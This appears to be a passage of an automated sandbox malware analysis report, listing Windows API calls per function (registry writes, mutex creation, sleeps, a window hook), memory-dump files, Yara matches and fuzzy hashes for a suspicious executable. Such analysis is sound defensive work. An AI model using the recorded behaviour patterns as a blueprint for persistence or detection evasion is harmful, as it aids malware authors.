                                    • Instruction ID: 04c995728c0db22c9f6d93fca45e534aaa6db4858db8948a377233c4db4ff7e1
                                    • Opcode Fuzzy Hash: 791d3da861a4213daf922dd3f3ff3c9a51d35c2339783c417bd9a6ae154d14d2
                                    • Instruction Fuzzy Hash: D221B871D44228ABDB24CB65DC85BDEBB78AB18700F1045DAE349A61C0D7F05BC4CF91
                                    Function 0242D570 Relevance: 6.1, APIs: 4, Instructions: 102sleepmemorythreadCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GlobalAlloc.KERNEL32(00000040,00015000), ref: 0242D59D
                                      • Part of subcall function 02427C71: MapViewOfFile.KERNEL32(00000264,00000006,00000000,00000000,00015400), ref: 02427CA8
                                      • Part of subcall function 02427C71: UnmapViewOfFile.KERNEL32(?), ref: 02427CD7
                                    • GlobalFree.KERNELBASE(?), ref: 0242D5E5
                                    • Sleep.KERNEL32(00002800), ref: 0242D6C0
                                    • RtlExitUserThread.NTDLL(00000000), ref: 0242D6E3
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3795163173.0000000002420000.00000040.00001000.00020000.00000000.sdmp, Offset: 02420000, based on PE: true
                                    • Associated: 00000006.00000002.3795163173.0000000002495000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.0000000002498000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.000000000249B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.00000000024A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.00000000024A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_2420000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: FileGlobalView$AllocExitFreeSleepThreadUnmapUser
                                    • String ID:
                                    • API String ID: 2983513495-0
                                    • Opcode ID: 94639874e48aabeb55cb6c96f3c2512629e57d414c5a80d19c1d9aca2351100c
                                    • Instruction ID: 3a069f4d85919a9b9e4b13d7577cab047bb6364680c34bb1f412fe4cc48e956d
                                    • Opcode Fuzzy Hash: 94639874e48aabeb55cb6c96f3c2512629e57d414c5a80d19c1d9aca2351100c
                                    • Instruction Fuzzy Hash: D731F1B0E40314EBEB05CB96DC4AFAE7B74FB49B24F54421AE81572380E7B65904CF61
                                    Function 0042E160 Relevance: 6.1, APIs: 4, Instructions: 94windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SendMessageA.USER32(?,00000080,00000001,?), ref: 0042E208
                                    • SendMessageA.USER32(?,00000080,00000000,?), ref: 0042E21A
                                    • DestroyCursor.USER32(?), ref: 0042E22D
                                    • DestroyCursor.USER32(?), ref: 0042E23A
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: CursorDestroyMessageSend
                                    • String ID:
                                    • API String ID: 3501257726-0
                                    • Opcode ID: 1a0de11eec5bd70e6b99d895bf3b9f2223301a4fd7f54979977f30c02498481c
                                    • Instruction ID: 9dfa884d3d7da8994ecc66b5f118525577fb5e29d2b3686f36fa3d43373e2714
                                    • Opcode Fuzzy Hash: 1a0de11eec5bd70e6b99d895bf3b9f2223301a4fd7f54979977f30c02498481c
                                    • Instruction Fuzzy Hash: 05312071704311AFD720DF6AE881BABB3E8EFD4714F44882EF99597340D674E8098B66
                                    Function 02421970 Relevance: 6.1, APIs: 4, Instructions: 83registrystringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • wsprintfA.USER32 ref: 024219A6
                                    • lstrcpy.KERNEL32(?,00000000), ref: 02421A54
                                    • lstrcpy.KERNEL32(?,00000000), ref: 02421A7B
                                    • RegSetValueExA.KERNEL32(?,?,00000000,00000004,?,00000004), ref: 02421AA5
                                    • lstrlen.KERNEL32(?), ref: 02421AB4
                                    • RegSetValueExA.KERNEL32(?,?,00000000,00000001,?,00000000), ref: 02421AD4
                                    • RegCloseKey.KERNEL32(?), ref: 02421AE6
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3795163173.0000000002420000.00000040.00001000.00020000.00000000.sdmp, Offset: 02420000, based on PE: true
                                    • Associated: 00000006.00000002.3795163173.0000000002495000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.0000000002498000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.000000000249B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.00000000024A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.00000000024A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_2420000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Valuelstrcpy$Closelstrlenwsprintf
                                    • String ID:
                                    • API String ID: 3050549977-0
                                    • Opcode ID: b06cf420f09a1b2dc755e093939e4b47ee7872720005b08a1ee65756dec1c0d9
                                    • Instruction ID: 0068473973f92475bfe027b8eae243a75b8680d6b50ac9a18efc658134b6cb41
                                    • Opcode Fuzzy Hash: b06cf420f09a1b2dc755e093939e4b47ee7872720005b08a1ee65756dec1c0d9
                                    • Instruction Fuzzy Hash: C23128B4D40128EFCB18CF15C845ADABBB5BB58341F4085D9EB4EAA241D7319ED6CFA0
                                    Function 0047F900 Relevance: 6.0, APIs: 4, Instructions: 49windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SendMessageA.USER32(?,00000030,?,00000001), ref: 0047F931
                                    • SendMessageA.USER32(?,00000030,?,00000001), ref: 0047F949
                                    • GetStockObject.GDI32(00000011), ref: 0047F953
                                    • SendMessageA.USER32(?,00000030,00000000,00000001), ref: 0047F973
                                      • Part of subcall function 00413AE0: CreateFontIndirectA.GDI32 ref: 00413B29
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: MessageSend$CreateFontIndirectObjectStock
                                    • String ID:
                                    • API String ID: 1613733799-0
                                    • Opcode ID: 1a86fb4f36b4e3f216535004a41a4327ab5c70535b3ee5fe21b9588658f8ccb0
                                    • Instruction ID: 7ba323b023f11abbe6b28cd1dca6465a33eabfc51909535318ea8c8bedf9738f
                                    • Opcode Fuzzy Hash: 1a86fb4f36b4e3f216535004a41a4327ab5c70535b3ee5fe21b9588658f8ccb0
                                    • Instruction Fuzzy Hash: 0B0188B6604210BFCB50DB94EC45F9737A8AF887A0F058469BA489B290C774EC42CBA4
                                    Function 0242D23D Relevance: 6.0, APIs: 4, Instructions: 30memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • FindCloseChangeNotification.KERNEL32(00000000), ref: 0242D257
                                    • CloseHandle.KERNEL32(?), ref: 0242D277
                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0242D28F
                                    • HeapFree.KERNEL32(00000000), ref: 0242D296
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3795163173.0000000002420000.00000040.00001000.00020000.00000000.sdmp, Offset: 02420000, based on PE: true
                                    • Associated: 00000006.00000002.3795163173.0000000002495000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.0000000002498000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.000000000249B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.00000000024A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.00000000024A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_2420000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseHeap$ChangeFindFreeHandleNotificationProcess
                                    • String ID:
                                    • API String ID: 3129886909-0
                                    • Opcode ID: 07a6fb3c2d537b71558351a629b24b7bbd7cacf2d003a6ec99b480a1614a345b
                                    • Instruction ID: 4a4680784d69b3a72e1eb478ac62641a7a917b20a6b0d3bd6bb45cbbdc98bb20
                                    • Opcode Fuzzy Hash: 07a6fb3c2d537b71558351a629b24b7bbd7cacf2d003a6ec99b480a1614a345b
                                    • Instruction Fuzzy Hash: C7F04FB9D00268CBEB258FA5D80C7EDB770FB48325F0085DAE51993280C77549D4CF20
                                    Function 0242CC39 Relevance: 6.0, APIs: 4, Instructions: 24sleepthreadCOMMON
                                    Download Yara Rule
                                    APIs
                                    • Sleep.KERNEL32(00001000), ref: 0242CC41
                                    • RtlExitUserThread.NTDLL(00000000), ref: 0242CC88
                                      • Part of subcall function 0242CB2D: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00000009,?), ref: 0242CB75
                                      • Part of subcall function 0242CB2D: RegEnumValueA.KERNEL32(?,00000000,00000000,00000100,00000000,00000000,00000000,00000000), ref: 0242CBB2
                                      • Part of subcall function 0242CB2D: RegCloseKey.ADVAPI32(?), ref: 0242CC2E
                                    • Sleep.KERNEL32(00004E20), ref: 0242CC64
                                      • Part of subcall function 0242CB2D: GetFileAttributesA.KERNEL32(00000000), ref: 0242CBDB
                                      • Part of subcall function 0242CB2D: Sleep.KERNEL32(00000100), ref: 0242CC11
                                    • Sleep.KERNEL32(00057E40), ref: 0242CC7E
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3795163173.0000000002420000.00000040.00001000.00020000.00000000.sdmp, Offset: 02420000, based on PE: true
                                    • Associated: 00000006.00000002.3795163173.0000000002495000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.0000000002498000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.000000000249B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.00000000024A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.00000000024A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_2420000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Sleep$AttributesCloseEnumExitFileOpenThreadUserValue
                                    • String ID:
                                    • API String ID: 3734488975-0
                                    • Opcode ID: 9f505ddfe3567acf9a30106ee6c53e98fd5d1f499e031603ad95fe76fefb0ddb
                                    • Instruction ID: a1dff960aa0a36846bba5aa98d55aafde4c6e901587c86dae2e5de9f632045dd
                                    • Opcode Fuzzy Hash: 9f505ddfe3567acf9a30106ee6c53e98fd5d1f499e031603ad95fe76fefb0ddb
                                    • Instruction Fuzzy Hash: 2BE0D8B1A8430067E1096773FD4AB5B3E659704743F005427F60A41280EB729828C662
                                    Function 004234C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00424D50: CreatePen.GDI32(-00000001,?,?), ref: 00424DD2
                                    • GetStockObject.GDI32(00000005), ref: 004235A3
                                    • LoadCursorA.USER32(00000000,00007F00), ref: 004235B1
                                      • Part of subcall function 004343B0: GetClassInfoA.USER32(?,?,?), ref: 004343C8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: ClassCreateCursorInfoLoadObjectStock
                                    • String ID: _EL_DrawPanel
                                    • API String ID: 263904558-4003497747
                                    • Opcode ID: 9ac7f8c863350940e6e1986d1f26cf9e81115b3c04aed88735904e849c880fc6
                                    • Instruction ID: 0460f0353c4b2de318bb1f15f0897d884f5d39077a524cd576f4d87ccd0fd8c8
                                    • Opcode Fuzzy Hash: 9ac7f8c863350940e6e1986d1f26cf9e81115b3c04aed88735904e849c880fc6
                                    • Instruction Fuzzy Hash: 62317EB1704750AFD314DF18DC41F6BB7E5EB88B04F40491EF55987381DB79A9008BAA
                                    Function 0242FB41 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47registryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • wsprintfA.USER32 ref: 0242FBC9
                                    • RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004), ref: 0242FC06
                                    • RegCloseKey.KERNEL32(00000000), ref: 0242FCD5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3795163173.0000000002420000.00000040.00001000.00020000.00000000.sdmp, Offset: 02420000, based on PE: true
                                    • Associated: 00000006.00000002.3795163173.0000000002495000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.0000000002498000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.000000000249B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.00000000024A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.00000000024A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_2420000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseQueryValuewsprintf
                                    • String ID: %c%d_%d
                                    • API String ID: 2691868063-4129319098
                                    • Opcode ID: 61ce7898fa3edff1f8ec89299f17681fa911a36080b622e5157a27156af886a5
                                    • Instruction ID: 32de78e32376109dc824deebc32f7b472dcbb8c7c728236e4f260a89430e46ac
                                    • Opcode Fuzzy Hash: 61ce7898fa3edff1f8ec89299f17681fa911a36080b622e5157a27156af886a5
                                    • Instruction Fuzzy Hash: 951104B1D41228EBDB24CF95DD88BD9B7B4BB48304F9045DAD10AA7280C7749BC8CF94
                                    Function 0242FB8B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36registryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • wsprintfA.USER32 ref: 0242FBC9
                                    • RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004), ref: 0242FC06
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3795163173.0000000002420000.00000040.00001000.00020000.00000000.sdmp, Offset: 02420000, based on PE: true
                                    • Associated: 00000006.00000002.3795163173.0000000002495000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.0000000002498000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.000000000249B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.00000000024A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.00000000024A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_2420000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: QueryValuewsprintf
                                    • String ID: %c%d_%d
                                    • API String ID: 2072284396-4129319098
                                    • Opcode ID: d305161aba741c62dad010c15a7f468163b7b2e96f158f8e28fb27a34dc522f5
                                    • Instruction ID: 4f144ddb4fc222ac7addf6017533c9e4e2ccc30cffb288fb3a6aa9587b49f636
                                    • Opcode Fuzzy Hash: d305161aba741c62dad010c15a7f468163b7b2e96f158f8e28fb27a34dc522f5
                                    • Instruction Fuzzy Hash: F1012CB1D41128ABDB24CF95DD8CFEAB7B8BB48304F5041C9E209A6240C7749BC8CF94
                                    Function 004BE384 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25threadCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 004C5FF6: TlsGetValue.KERNEL32(006142FC,00000000,00000100,004C5A7D,004C5377,004C1DA3,00000100,004C1D3C,005BDEE8,?,00000100,00000000,0042AC80), ref: 004C6035
                                    • GetCurrentThreadId.KERNEL32 ref: 004BE3A6
                                    • SetWindowsHookExA.USER32(00000005,004BE18E,00000000,00000000), ref: 004BE3B6
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: CurrentHookThreadValueWindows
                                    • String ID: Ba
                                    • API String ID: 933525246-483125461
                                    • Opcode ID: 29b9aae5abd4fca5964503a250fd4b29605abe3faa42ce6b15b05b221eeec5e8
                                    • Instruction ID: 9a133aeb3c36cc048caf52070f3eafec8a41bf6220206912175d0c19844cb158
                                    • Opcode Fuzzy Hash: 29b9aae5abd4fca5964503a250fd4b29605abe3faa42ce6b15b05b221eeec5e8
                                    • Instruction Fuzzy Hash: 08E06531600B00AED2709F675905F9B76E8DBD5B51F10553FF54982640D674E841CB7D
                                    Function 04360005 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 10sleepsynchronizationCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateMutexA.KERNEL32(00000000,00000000,#u6587#u4ef6#u7279#u5f81#u6458#u8981#u5217#u8868#u751f#u6210.exeM_7248_), ref: 04360017
                                    • Sleep.KERNEL32(000000FF), ref: 0436001F
                                    Strings
                                    • #u6587#u4ef6#u7279#u5f81#u6458#u8981#u5217#u8868#u751f#u6210.exeM_7248_, xrefs: 04360012
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3831264888.0000000004360000.00000040.00001000.00020000.00000000.sdmp, Offset: 04360000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_4360000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: CreateMutexSleep
                                    • String ID: #u6587#u4ef6#u7279#u5f81#u6458#u8981#u5217#u8868#u751f#u6210.exeM_7248_
                                    • API String ID: 1464230837-1497663014
                                    • Opcode ID: 041385edafa9481cfd7278016624504f93ce3e81e88add6092aebc8c37314de0
                                    • Instruction ID: 1d44c73c4c72566f86f16d72ba092226a098a11c191c5e516ff06e97ad5edb19
                                    • Opcode Fuzzy Hash: 041385edafa9481cfd7278016624504f93ce3e81e88add6092aebc8c37314de0
                                    • Instruction Fuzzy Hash: 0CC080315441CD57D700EEA08C09B6837385B08712F100312F5B9A8CE4D73062804B1F
                                    Function 006287E8 Relevance: 4.8, APIs: 3, Instructions: 256sleepsynchronizationCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateMutexA.KERNEL32(00000000,00000000,?), ref: 00628902
                                    • FindCloseChangeNotification.KERNEL32 ref: 0062891A
                                    • Sleep.KERNEL32(00002710), ref: 00628925
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: ChangeCloseCreateFindMutexNotificationSleep
                                    • String ID:
                                    • API String ID: 607942068-0
                                    • Opcode ID: f9939f4a1a6ffcb6437ec841425aad15b476a2f1f311277c3848372b926bea02
                                    • Instruction ID: 350572bdaea0304a70c33adcd584c926e5516770ea4a4ad03808ccf75b2d784f
                                    • Opcode Fuzzy Hash: f9939f4a1a6ffcb6437ec841425aad15b476a2f1f311277c3848372b926bea02
                                    • Instruction Fuzzy Hash: 51B17B75A016998FEF10CF18DD44BE937A6FF54301F484829DC09AF2A1DB75AA81CF4A
                                    Function 02422399 Relevance: 4.7, APIs: 3, Instructions: 239COMMON
                                    Download Yara Rule
                                    APIs
                                    • RtlEnterCriticalSection.NTDLL(02434050), ref: 02422410
                                    • RtlLeaveCriticalSection.NTDLL(02434050), ref: 02422724
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3795163173.0000000002420000.00000040.00001000.00020000.00000000.sdmp, Offset: 02420000, based on PE: true
                                    • Associated: 00000006.00000002.3795163173.0000000002495000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.0000000002498000.00000040.00001000.00020000.00000000.sdmpDownload File
